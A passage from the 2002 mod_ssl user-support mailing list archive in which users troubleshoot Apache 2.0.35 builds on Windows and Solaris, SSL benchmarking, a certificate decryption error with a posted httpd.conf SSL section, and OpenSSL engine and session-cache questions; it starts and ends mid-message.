mod_ssl - Win32=20
Release--------------------
Generating ssl_expr_parse.c/.h from=20
ssl_expr_parse.y
/usr/local/share/bison.simple: No such file or=20
directory
bison: The system cannot find the file specified.
Could =
Not Find=20
C:\ross\work\projects\apache_ssl_php\httpd-2.0.35\modules\ssl\y.tab.c
=
The=20
system cannot find the file specified.
Could Not Find=20
C:\ross\work\projects\apache_ssl_php\httpd-2.0.35\modules\ssl\y.tab.h
=
Error=20
executing c:\winnt\system32\cmd.exe.
mod_ssl.so - 1 error(s), 0=20
warning(s)
--------------------Configuration: abs - Win32=20
Release--------------------
Compiling...
ab.c
C:\ross\work\proje=
cts\apache_ssl_php\httpd-2.0.35\support\ab.c(164)=20
: fatal error C1083: Cannot open include file: 'open
ssl/rsa.h': No =
such file=20
or directory
Error executing cl.exe.
abs.exe - 1 error(s), 0=20
warning(s)
NMAKE : fatal error U1077: 'msdev' : return code=20
'0x2'
Stop.
Error executing NMAKE.


 


Apache.exe - 4 error(s), 4 =
warning(s)
NMAKE :=20
fatal error U1077: 'msdev' : return code '0x4'
Stop.
NMAKE : fatal =
error=20
U1077: '"C:\Program Files\Microsoft Visual Studio\VC98\bin\NMAKE.EXE"' : =
return=20
code '0x2'
Stop.


<<<<<<<<<<<<<<<<=
<<<<<<<<<<<<<<<<<<&=
lt;<<<<<<<<<<<<<<<<


 


Does anyone have a suggestion as to how =
i can get=20
round this.


The 'y.tab.c' and 'y.tab.h' files seem =
to be=20
generated by sed, but the cygwin version doesn't seem to be being =
used.(i think=20
:-} )


 


thanks


 


Ross


------=_NextPart_000_0007_01C1EF91.25AF5AF0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Apr 29 21:33:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA12512; Mon, 29 Apr 2002 21:32:47 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id VAA12450; Mon, 29 Apr 2002 21:31:39 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3TJU7o16952;
	Mon, 29 Apr 2002 15:30:07 -0400
Date: Mon, 29 Apr 2002 15:30:07 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: paul priestman 
cc: modssl-users@modssl.org
Subject: Re: Performance issues - testing
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 29 Apr 2002, paul priestman wrote:

> I am having worries about the performance of using mod_ssl.  Can anyone
> suggest any good testing package that will give me hits per second when
> running on a https server and hits per second when running on a normal http
> server so i can compare the performance. I am using apache 1.3.22 with mod
> ssl.

ApacheBench (ab), which comes with Apache, supports SSL.  Or at least the
one that comes with Apache 2.0 does... I don't know about the 1.3 version.

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 30 03:05:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA06316; Tue, 30 Apr 2002 03:03:32 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA06258; Tue, 30 Apr 2002 03:02:31 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 405254CE91A; Tue, 30 Apr 2002 03:02:30 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3TJLF505563; Mon, 29 Apr 2002 21:21:15 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.BNFUSA.com id UAA09284; Mon, 29 Apr 2002 20:44:40 +0200 (MET DST)
Message-id: 
Date: Mon, 29 Apr 2002 13:45:23 -0500
Subject: security failure data decryption error
To: modssl-users@modssl.org
From: "mailing list" 
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "mailing list" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

I am getting the following error:

"Security Failure. Data decryption error"

I have a newly assigned certificate from verisign.  I created the private
key as instructed by verisign.  Does anyone have any suggestions?

Here is my config:

path to certificate and private key: etc/httpd/conf/ssl.crt
The private key is encrypted.
certificate file: server.crt
key file: private.key
the root directory for my website is: /www/meyercousa

Here is the chunk of SSL config data from my httpd.conf file:



#  General setup for the virtual host
# DocumentRoot "/var/www/html"
DocumentRoot "/www/meyercousa"



#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on

#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
#SSLCipherSuite ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

#   Server Certificate:
#   Point SSLCertificateFile at a PEM encoded certificate.  If
#   the certificate is encrypted, then you will be prompted for a
#   pass phrase.  Note that a kill -HUP will prompt again. A test
#   certificate can be generated with `make certificate' under
#   built time. Keep in mind that if you've both a RSA and a DSA
#   certificate you can configure both in parallel (to also allow
#   the use of DSA ciphers, etc.)
#SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
#SSLCertificateFile /etc/httpd/conf/ssl.crt/server-dsa.crt

SSLCACertificatePath /etc/httpd/conf/ssl.crt
SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.crt/private.key


#   Server Private Key:
#   If the key is not combined with the certificate, use this
#   directive to point at the key file.  Keep in mind that if
#   you've both a RSA and a DSA private key you can configure
#   both in parallel (to also allow the use of DSA ciphers, etc.)
#SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
#SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server-dsa.key

#   Server Certificate Chain:
#   Point SSLCertificateChainFile at a file containing the
#   concatenation of PEM encoded CA certificates which form the
#   certificate chain for the server certificate. Alternatively
#   the referenced file can be the same as SSLCertificateFile
#   when the CA certificates are directly appended to the server
#   certificate for convinience.
#SSLCertificateChainFile /etc/httpd/conf/ssl.crt/ca.crt

#   Certificate Authority (CA):
#   Set the CA certificate verification path where to find CA
#   certificates for client authentication or alternatively one
#   huge file containing all of them (file must be PEM encoded)
#   Note: Inside SSLCACertificatePath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCACertificatePath /etc/httpd/conf/ssl.crt
#SSLCACertificateFile /etc/httpd/conf/ssl.crt/ca-bundle.crt

#   Certificate Revocation Lists (CRL):
#   Set the CA revocation path where to find CA CRLs for client
#   authentication or alternatively one huge file containing all
#   of them (file must be PEM encoded)
#   Note: Inside SSLCARevocationPath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCARevocationPath /etc/httpd/conf/ssl.crl
#SSLCARevocationFile /etc/httpd/conf/ssl.crl/ca-bundle.crl
#   Client Authentication (Type):
#   Client certificate verification type and depth.  Types are
#   none, optional, require and optional_no_ca.  Depth is a
#   number which specifies how deeply to verify the certificate
#   issuer chain before deciding the certificate is not valid.
#SSLVerifyClient require
#SSLVerifyDepth  10

#   Access Control:
#   With SSLRequire you can do per-directory access control based
#   on arbitrary complex boolean expressions containing server
#   variable checks and other lookup directives.  The syntax is a
#   mixture between C and Perl.  See the mod_ssl documentation
#   for more details.
#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)-/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
#
#   SSL Engine Options:
#   Set various options for the SSL engine.
#   o FakeBasicAuth:
#     Translate the client X.509 into a Basic Authorisation.  This means
that
#     the standard Auth/DBMAuth methods can be used for access control. 
The
#     user name is the `one line' version of the client's X.509
certificate.
#     Note that no password is obtained from the user. Every entry in the
user
#     file needs this password: `xxj31ZMTZzkVA'.
#   o ExportCertData:
#     This exports two additional environment variables: SSL_CLIENT_CERT
and
#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
#     server (always existing) and the client (only existing when client
#     authentication is used). This can be used to import the certificates
#     into CGI scripts.
#   o StdEnvVars:
#     This exports the standard SSL/TLS related `SSL_*' environment
variables.
#     Per default this exportation is switched off for performance reasons,
#     because the extraction step is an expensive operation and is usually
#     useless for serving static content. So one usually enables the
#     exportation for CGI and SSI requests only.
#   o CompatEnvVars:
#     This exports obsolete environment variables for backward
compatibility
#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. Use
this
#     to provide compatibility to existing CGI scripts.
#   o StrictRequire:
#     This denies access when "SSLRequireSSL" or "SSLRequire" applied even
#     under a "Satisfy any" situation, i.e. when it applies access is
denied
#     and no other module can change it.
#   o OptRenegotiate:
#     This enables optimized SSL connection renegotiation handling when SSL
#     directives are used in per-directory context.
#SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for this.
SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown

#   Per-Server Logging:
#   The home of a custom SSL log file. Use this when you want a
#   compact non-error SSL logfile on a virtual host basis.
CustomLog /var/log/httpd/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"



Any help would be greatly appreciated,


Adrian Mcmanus

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 30 14:21:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA22426; Tue, 30 Apr 2002 14:20:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.espgroup.net id OAA22415; Tue, 30 Apr 2002 14:20:00 +0200 (MET DST)
Received: from no.name.available by mail.espgroup.net
          via smtpd (for opensource-01.ee.ethz.ch [129.132.7.153]) with SMTP; 30 Apr 2002 12:11:04 UT
Received: (private information removed)
Received: from [63.66.134.226] by brickwall.espgroup.net
          via smtpd (for [10.3.1.2]) with SMTP; 30 Apr 2002 12:11:02 UT
Message-ID: <3CCE8CCF.5030902@espgroup.net>
Date: Tue, 30 Apr 2002 08:23:43 -0400
From: "Dwayne Miller" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc1) Gecko/20020417
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: win2000 compile
References: <000a01c1ef88$c401d650$6723a8c0@stevewin2000>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dwayne Miller" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Try extracting the zip again (or get ssl_expr_parse.x from CVS).  Your 
attempt to build probaby resulted in empty files for 
ssl_expr_parse.c/.h.  Then edit (or touch) the .c/.h version to make 
them modified after ssl_expr_parse.y.  They do not need to be rebuilt, 
but since their timestamps are wrong, make believes they are out of date.

The same problem might exist with the tab.c/.h files.


ross wrote:

> hi,
>  
> I am trying to compile apache 2 with mod_ssl on win2000.(visual c++ 6)
> (I'm not a c++ developer, java is much more my thing.)
>  
> I have compiled openssl successfully and installed cygwin.
>  
> but when trying to compile apache2 I get the following errors from 
> mod_ssl.
>  
> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
> --------------------Configuration: mod_ssl - Win32 
> Release--------------------
> Generating ssl_expr_parse.c/.h from ssl_expr_parse.y
> /usr/local/share/bison.simple: No such file or directory
> bison: The system cannot find the file specified.
> Could Not Find 
> C:\ross\work\projects\apache_ssl_php\httpd-2.0.35\modules\ssl\y.tab.c
> The system cannot find the file specified.
> Could Not Find 
> C:\ross\work\projects\apache_ssl_php\httpd-2.0.35\modules\ssl\y.tab.h
> Error executing c:\winnt\system32\cmd.exe.
> mod_ssl.so - 1 error(s), 0 warning(s)
> --------------------Configuration: abs - Win32 Release--------------------
> Compiling...
> ab.c
> C:\ross\work\projects\apache_ssl_php\httpd-2.0.35\support\ab.c(164) : 
> fatal error C1083: Cannot open include file: 'open
> ssl/rsa.h': No such file or directory
> Error executing cl.exe.
> abs.exe - 1 error(s), 0 warning(s)
> NMAKE : fatal error U1077: 'msdev' : return code '0x2'
> Stop.
> Error executing NMAKE.
>  
> Apache.exe - 4 error(s), 4 warning(s)
> NMAKE : fatal error U1077: 'msdev' : return code '0x4'
> Stop.
> NMAKE : fatal error U1077: '"C:\Program Files\Microsoft Visual 
> Studio\VC98\bin\NMAKE.EXE"' : return code '0x2'
> Stop.
> <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
>  
> Does anyone have a suggestion as to how i can get round this.
> The 'y.tab.c' and 'y.tab.h' files seem to be generated by sed, but the 
> cygwin version doesn't seem to be being used.(i think :-} )
>  
> thanks
>  
> Ross



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr 30 15:46:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA28480; Tue, 30 Apr 2002 15:45:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id PAA28427; Tue, 30 Apr 2002 15:44:37 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g3UDhEU00449
	for ; Tue, 30 Apr 2002 09:43:14 -0400
Date: Tue, 30 Apr 2002 09:43:14 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: win2000 compile
In-Reply-To: <3CCE8CCF.5030902@espgroup.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 30 Apr 2002, Dwayne Miller wrote:

> Try extracting the zip again (or get ssl_expr_parse.x from CVS).  Your
> attempt to build probaby resulted in empty files for
> ssl_expr_parse.c/.h.  Then edit (or touch) the .c/.h version to make
> them modified after ssl_expr_parse.y.  They do not need to be rebuilt,
> but since their timestamps are wrong, make believes they are out of date.

Right.  The timestamps were bad in the tarball.  This is fixed in 2.0.36,
which will be released soon.  For now, the files you need to touch are:

ssl_expr_parse.c
ssl_expr_parse.h
ssl_expr_scan.c

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  1 21:49:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA26165; Wed, 1 May 2002 21:48:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from irvexch1.rainbow.com id VAA26108; Wed, 1 May 2002 21:47:53 +0200 (MET DST)
Message-ID: <5606C687D4C7D5119A5800508BF30DB401C043F2@mail.rainbow.com>
From: Lynn Gazis 
To: "'modssl-users@modssl.org'" 
Subject: More Apache 2.0.35 testing
Date: Wed, 1 May 2002 12:50:42 -0700 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lynn Gazis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm now getting unresolved externals when trying to build Apache 2.0.35 with
SSL enabled on Solaris 7, and would like, before I go farther in trying to
diagnose this particular problem (and the shared memory cache problem I am
having on HP UX), to ask a couple of general questions:

1) In testing Apache 2.0, should I be testing with the latest version of
OpenSSL 0.9.6 or with the latest pre-release version of OpenSSL 0.9.7?

2) Is there some option that I have not found which I should be using to
enable to engine code (right now I am doing so by modifying mod_ssl.h to
turn SSL_EXPERIMENTAL and SSL_ENGINE on)?

3) Should the shared memory cache be automatically included in Apache 2.0,
or should I be somehow including mm-1.1.3, as I have been doing with modssl?

4) Should I be reporting problems I run across in testing Apache 2.0 to a
different list from this one?

Lynn Gazis
Rainbow Technologies

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  1 22:02:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA26964; Wed, 1 May 2002 22:01:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id WAA26867; Wed, 1 May 2002 22:00:04 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id PAA19653;
	Wed, 1 May 2002 15:04:49 -0400
Date: Wed, 1 May 2002 15:04:49 -0400 (EDT)
From: "R. DuFresne" 
To: Lynn Gazis 
cc: "'modssl-users@modssl.org'" 
Subject: Re: More Apache 2.0.35 testing
In-Reply-To: <5606C687D4C7D5119A5800508BF30DB401C043F2@mail.rainbow.com>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 1 May 2002, Lynn Gazis wrote:

> I'm now getting unresolved externals when trying to build Apache 2.0.35 with
> SSL enabled on Solaris 7, and would like, before I go farther in trying to
> diagnose this particular problem (and the shared memory cache problem I am
> having on HP UX), to ask a couple of general questions:
> 
> 1) In testing Apache 2.0, should I be testing with the latest version of
> OpenSSL 0.9.6 or with the latest pre-release version of OpenSSL 0.9.7?
> 

perhaps the most stable code will be either 0.9.6b or 0.9.6c, I can't
speak for 0.9.7.

> 2) Is there some option that I have not found which I should be using to
> enable to engine code (right now I am doing so by modifying mod_ssl.h to
> turn SSL_EXPERIMENTAL and SSL_ENGINE on)?

There are two versions of openssl source available, the engine version and
the non-engine version.  Both will work pretty much the same.  But, if you
ever intend upon using hardware encryption devices you will want the
engine version.


> 
> 3) Should the shared memory cache be automatically included in Apache 2.0,
> or should I be somehow including mm-1.1.3, as I have been doing with modssl?
> 

My understanding is that mm is not longer required.  So yes, its built in.

> 4) Should I be reporting problems I run across in testing Apache 2.0 to a
> different list from this one?
> 

This list is at least one spot, I'm sure others here might recommend other
lists to x-post such problems to.

Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  1 22:16:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA28079; Wed, 1 May 2002 22:15:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from irvexch1.rainbow.com id WAA27929; Wed, 1 May 2002 22:14:38 +0200 (MET DST)
Message-ID: <5606C687D4C7D5119A5800508BF30DB401C043F3@mail.rainbow.com>
From: Lynn Gazis 
To: "'modssl-users@modssl.org'" 
Subject: RE: More Apache 2.0.35 testing
Date: Wed, 1 May 2002 13:17:36 -0700 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lynn Gazis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, 1 May 2002, R. DuFresne wrote:

>On Wed, 1 May 2002, Lynn Gazis wrote:

>> I'm now getting unresolved externals when trying to build Apache 2.0.35
with
>> SSL enabled on Solaris 7, and would like, before I go farther in trying
to
>> diagnose this particular problem (and the shared memory cache problem I
am
>> having on HP UX), to ask a couple of general questions:
>> 
>> 1) In testing Apache 2.0, should I be testing with the latest version of
>> OpenSSL 0.9.6 or with the latest pre-release version of OpenSSL 0.9.7?
>> 

>perhaps the most stable code will be either 0.9.6b or 0.9.6c, I can't
>speak for 0.9.7.

Stability is one consideration, but actually not my primary consideration at
this point, since I'm not in a production environment, and am testing to
ensure that Rainbow's cryptographic accelerator continues to be supported by
Apache, rather than because I want to put a Web server into production with
Apache 2.0 here in the near future.  What I'm wondering is, between OpenSSL
0.9.6 and still in production OpenSSL 0.9.7, which is Apache 2.0 actually
designed to support, and which would I be best off reporting bugs against?

>> 2) Is there some option that I have not found which I should be using to
>> enable to engine code (right now I am doing so by modifying mod_ssl.h to
>> turn SSL_EXPERIMENTAL and SSL_ENGINE on)?

>There are two versions of openssl source available, the engine version and
>the non-engine version.  Both will work pretty much the same.  But, if you
>ever intend upon using hardware encryption devices you will want the
>engine version.

Since I'm testing cryptographic accelerator support, I have been using the
engine version of OpenSSL 0.9.6b or 0.9.6c (whichever I happened to have
already installed on each platform that I'm testing on).  However, there is
some modssl code incorporated in Apache 2.0, which allows the
SSLCryptoDevice line in ssl.conf to be recognized, and I'm finding that this
code does not get recognized unless I modify mod_ssl.h (whereas, in
mod_ssl-2.8.6-1.3.23, I am able to turn this code on with
--enable-rule=SSL_EXPERIMENTAL).


>> 
>> 3) Should the shared memory cache be automatically included in Apache
2.0,
>> or should I be somehow including mm-1.1.3, as I have been doing with
modssl?
>> 

>My understanding is that mm is not longer required.  So yes, its built in.

OK, in that case I should probably check further on what is going wrong on
my HP platform. 

>> 4) Should I be reporting problems I run across in testing Apache 2.0 to a
>> different list from this one?
>> 

>This list is at least one spot, I'm sure others here might recommend other
>lists to x-post such problems to.

Then I'll post to this list unless and until someone recommends a different
one.

Thanks,

Lynn Gazis
Rainbow Technologies

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  1 23:23:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA02140; Wed, 1 May 2002 23:22:19 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id XAA02094; Wed, 1 May 2002 23:21:11 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id D41C6BD2C; Wed,  1 May 2002 23:22:02 +0200 (CEST)
Date: Wed, 1 May 2002 23:22:02 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: More Apache 2.0.35 testing
Message-ID: <20020501212202.GC32460@marvin-lnx.int.tele.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <5606C687D4C7D5119A5800508BF30DB401C043F2@mail.rainbow.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <5606C687D4C7D5119A5800508BF30DB401C043F2@mail.rainbow.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, May 01, 2002 at 12:50:42PM -0700, Lynn Gazis wrote:
> I'm now getting unresolved externals when trying to build Apache 2.0.35 with
> SSL enabled on Solaris 7, and would like, before I go farther in trying to
> diagnose this particular problem (and the shared memory cache problem I am
> having on HP UX), to ask a couple of general questions:
> 
Which of the shared memory cache versions? There was a fix checked into cvs
a day or two ago.

> 1) In testing Apache 2.0, should I be testing with the latest version of
> OpenSSL 0.9.6 or with the latest pre-release version of OpenSSL 0.9.7?
> 
I think 0.9.6c is your safest bet - but 0.9.7 might work too.

> 2) Is there some option that I have not found which I should be using to
> enable to engine code (right now I am doing so by modifying mod_ssl.h to
> turn SSL_EXPERIMENTAL and SSL_ENGINE on)?

The old way doesn't work?
> 
> 3) Should the shared memory cache be automatically included in Apache 2.0,
> or should I be somehow including mm-1.1.3, as I have been doing with modssl?
> 
Shared memory is now supported by apr which is included in apache.

> 4) Should I be reporting problems I run across in testing Apache 2.0 to a
> different list from this one?
> 
This list should be fine - if you have confirmed bugs or patches, then the
bug tracking system at apache.org would be a nice place to dump a copy.

vh

Mads Toftum
-- 
With a rubber duck, one's never alone.
              -- "The Hitchhiker's Guide to the Galaxy"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  1 23:36:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA03014; Wed, 1 May 2002 23:35:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from irvexch1.rainbow.com id XAA03002; Wed, 1 May 2002 23:35:02 +0200 (MET DST)
Message-ID: <5606C687D4C7D5119A5800508BF30DB401C043F4@mail.rainbow.com>
From: Lynn Gazis 
To: "'modssl-users@modssl.org'" 
Subject: RE: More Apache 2.0.35 testing
Date: Wed, 1 May 2002 14:37:56 -0700 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lynn Gazis 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, May 01, 2002, Mads Toftum wrote:

>On Wed, May 01, 2002 at 12:50:42PM -0700, Lynn Gazis wrote:
>> I'm now getting unresolved externals when trying to build Apache 2.0.35
with
>> SSL enabled on Solaris 7, and would like, before I go farther in trying
to
>> diagnose this particular problem (and the shared memory cache problem I
am
>> having on HP UX), to ask a couple of general questions:
>> 
>Which of the shared memory cache versions? There was a fix checked into cvs
>a day or two ago.

The shmcb session cache.  Is that the one the fix is for?  If so, I'll try
it out.

>> 1) In testing Apache 2.0, should I be testing with the latest version of
>> OpenSSL 0.9.6 or with the latest pre-release version of OpenSSL 0.9.7?
>> 
>I think 0.9.6c is your safest bet - but 0.9.7 might work too.

OK, I'll test with 0.9.6c first, and try 0.9.7 if I have time.

>> 2) Is there some option that I have not found which I should be using to
>> enable to engine code (right now I am doing so by modifying mod_ssl.h to
>> turn SSL_EXPERIMENTAL and SSL_ENGINE on)?

>The old way doesn't work?

No, for some reason "SSLCryptoDevice cswift" isn't being recognized, in my
conf file, if I use --enable-rule=SSL_EXPERIMENTAL, but is recognized if I
go and modify mod_ssl.h directly.

Thanks.

Lynn Gazis
Rainbow Technologies
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed May  1 23:56:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA04123; Wed, 1 May 2002 23:55:24 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from marvin-lnx.int.tele.dk id XAA04083; Wed, 1 May 2002 23:54:34 +0200 (MET DST)
Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500)
	id A0DD7BD2C; Wed,  1 May 2002 23:55:26 +0200 (CEST)
Date: Wed, 1 May 2002 23:55:26 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: More Apache 2.0.35 testing
